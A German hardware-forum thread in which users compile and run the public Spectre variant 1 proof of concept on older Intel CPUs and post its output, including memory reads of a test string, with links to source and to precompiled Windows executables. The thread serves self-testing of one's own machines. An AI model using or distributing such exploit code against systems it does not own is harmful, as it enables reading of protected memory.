Realer Test auf spectre variant 1

kisser

Admiral
Registriert
Feb. 2005
Beiträge
8.250
Hallo liebe Freunde aktueller Sicherheitslücken.:cool_alt:

Da die Informationslage bzgl. betroffener CPUs nach wie vor dürftig ist, schlage ich vor, den von den Grazer Forscher veröffentlichen PoC (siehe letzte Seiten https://spectreattack.com/spectre.pdf) auf einer Vielzahl von CPUs zu testen.

Der PoC liegt derzeit nur im Quellcode vor, so dass man den selbst kompilieren muss, ggf. würde ich eine kompilierte Version auf Anfrage zur Verfügung stellen.

Insbesondere von Interesse sind hier ältere Systeme aus den Jahren 1995 bis 2007 (Intel P6 Architektur und neuer bzw. AMD K6 und neuer), weil ich dazu bis jetzt keine Infos finden konnte.

Testergebnisse neuerer CPUs finden sich hier: (dort kann man auch den Quellcode herunterladen)
https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6


Ich mache mal den Anfang:

Intel Core 2 Quad (Q9400): verwundbar.
Mit modifiziertem Quellcode folgende Ausgabe des Programms (einzelne Zeichen immer noch fehlerhaft)

Reading 40 bytes:
Reading at malicious_x = FFFFF0E8... Success: 0x68='h' score=29 (second best: 0x0D score=12)
Reading at malicious_x = FFFFF0E9... Success: 0x68='h' score=2
Reading at malicious_x = FFFFF0EA... Success: 0x00='?' score=8 (second best: 0x0E score=2)
Reading at malicious_x = FFFFF0EB... Success: 0x4D='M' score=2
Reading at malicious_x = FFFFF0EC... Success: 0x61='a' score=13 (second best: 0x0E score=4)
Reading at malicious_x = FFFFF0ED... Success: 0x67='g' score=2
Reading at malicious_x = FFFFF0EE... Success: 0x69='i' score=11 (second best: 0x0E score=3)
Reading at malicious_x = FFFFF0EF... Success: 0x63='c' score=9 (second best: 0x0E score=2)
Reading at malicious_x = FFFFF0F0... Success: 0x20=' ' score=2
Reading at malicious_x = FFFFF0F1... Success: 0x57='W' score=2
Reading at malicious_x = FFFFF0F2... Success: 0x6F='o' score=21 (second best: 0x06 score=8)
Reading at malicious_x = FFFFF0F3... Success: 0x6F='o' score=2
Reading at malicious_x = FFFFF0F4... Success: 0x64='d' score=9 (second best: 0x06 score=2)
Reading at malicious_x = FFFFF0F5... Success: 0x73='s' score=59 (second best: 0x00 score=26)
Reading at malicious_x = FFFFF0F6... Success: 0x20=' ' score=2
Reading at malicious_x = FFFFF0F7... Success: 0x61='a' score=2
Reading at malicious_x = FFFFF0F8... Success: 0x72='r' score=2
Reading at malicious_x = FFFFF0F9... Success: 0x65='e' score=2
Reading at malicious_x = FFFFF0FA... Success: 0x20=' ' score=7 (second best: 0x08 score=1)
Reading at malicious_x = FFFFF0FB... Success: 0x53='S' score=2
Reading at malicious_x = FFFFF0FC... Success: 0x71='q' score=2
Reading at malicious_x = FFFFF0FD... Success: 0x71='q' score=2
Reading at malicious_x = FFFFF0FE... Success: 0x65='e' score=2
Reading at malicious_x = FFFFF0FF... Success: 0x61='a' score=7 (second best: 0x0E score=1)
Reading at malicious_x = FFFFF100... Success: 0x6D='m' score=2
Reading at malicious_x = FFFFF101... Success: 0x69='i' score=2
Reading at malicious_x = FFFFF102... Success: 0x73='s' score=2
Reading at malicious_x = FFFFF103... Success: 0x68='h' score=15 (second best: 0x0D score=5)
Reading at malicious_x = FFFFF104... Success: 0x20=' ' score=17 (second best: 0x0D score=6)
Reading at malicious_x = FFFFF105... Success: 0x20=' ' score=9 (second best: 0x0E score=2)
Reading at malicious_x = FFFFF106... Success: 0x73='s' score=2
Reading at malicious_x = FFFFF107... Success: 0x73='s' score=2
Reading at malicious_x = FFFFF108... Success: 0x69='i' score=33 (second best: 0x0E score=14)
Reading at malicious_x = FFFFF109... Success: 0x66='f' score=2
Reading at malicious_x = FFFFF10A... Success: 0x72='r' score=105 (second best: 0x08 score=50)
Reading at malicious_x = FFFFF10B... Success: 0x72='r' score=37 (second best: 0x08 score=16)
Reading at malicious_x = FFFFF10C... Success: 0x67='g' score=23 (second best: 0x0C score=9)
Reading at malicious_x = FFFFF10D... Success: 0x65='e' score=2
Reading at malicious_x = FFFFF10E... Success: 0x2E='.' score=2
Reading at malicious_x = FFFFF10F... Success: 0x2E='.' score=2

Kurzversion des Tests:
https://www.sendspace.com/file/99s50r

Prüfsummen:
Datei: Spectre_PoC_short.exe
CRC-32: 9de127e5
MD4: 9085c5d5d10fd0fbf68313f8d399d188
MD5: 91319a68aa5fa9d606c026871010e0d3
SHA-1: 4fce2e705f81307698f0c8b93254485e850d028d

Langversion des Tests (längere Laufzeit, prüft mehrfach, den Speicher auszulesen):
https://www.sendspace.com/file/dv2mi8

Prüfsummen:
Datei: Spectre_PoC_long.exe
CRC-32: f9bfe727
MD4: 568cfd586b29a97915245e58892bdba6
MD5: 91044e1e6479edd49eb766455b2b0eb7
SHA-1: 5d7ee503acad8e44e95019b00539207cefdeaca8
 
Zuletzt bearbeitet:
Hätte hier einen Pentium D 630, allerdings keine Ahnung vom kompilieren...
 
Hab hier nur modernere Intel CPUs (Core-i Architektur), hab bei denen das schon ausprobiert und bestätigen können (ist ja kein Wunder).
@Xerox261286: Du brauchst einen C-Compiler, unter Linux einfach
Code:
gcc -o outputfilename spectre.c
Unter Windows kannst du das genauso machen, wenn du das Linux Subsystem drauf hast (oder du benutzt MSVC).
 
Hehe, die AV-Software-Hersteller schlafen nicht.
Gerade nochmal kompiliert, das meldet sich doch Avast. :D

Ich werd mal schauen, ob ich das Prog irgendwo hochladen kann. Moment.

Links siehe oben.
Ist natürlich für windows, kompiliert mit MSVC2017.
 

Anhänge

  • SpectreV.png
    SpectreV.png
    27,8 KB · Aufrufe: 269
Zuletzt bearbeitet:
Pentium D 630 CPU:

Reading 40 bytes:
Reading at malicious_x = FFFFF0E8... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0E9... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EA... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EB... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EC... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0ED... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EE... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EF... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F0... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F1... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F2... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F3... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F4... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F5... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F6... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F7... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F8... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F9... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FA... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FB... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FC... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FD... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FE... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FF... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF100... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF101... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF102... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF103... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF104... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF105... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF106... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF107... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF108... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF109... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10A... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10B... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10C... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10D... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10E... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10F... Success: 0xFF='?' score=0


Der längere Test ist der selbe wie der kleine.
 
Zuletzt bearbeitet:
Konsole öffnen und darüber das Programm starten.

/edit. you´re 2 fast 4 me. :D
Ergänzung ()

Und unter Linux läuft das bei dir? Seltsam.
 
Auf der Pentium Mühle läuft kein Linux, nur Windows 7 x64.
 
Ah, das hab ich ganz übersehen.
Also Pentium D 630 evtl. nicht betroffen
(unklar, weil man ja nicht auf generelle Nicht-Existenz der Lücke prüfen kann, evtl. sind nur einige Parameter im Programm wie der "Cache_Hit_Treshold" unpassend).
 
Zuletzt bearbeitet: (Schreibfehler korrigiert)
Ich habe auch noch 2 Pentium 4 PCs hier stehen, die werte editiere Morgen oben in meinen Beitrag rein.
 
Test auf Atom N455 erfolglos. Vermutlich nicht betroffen.
 
Zurück
Oben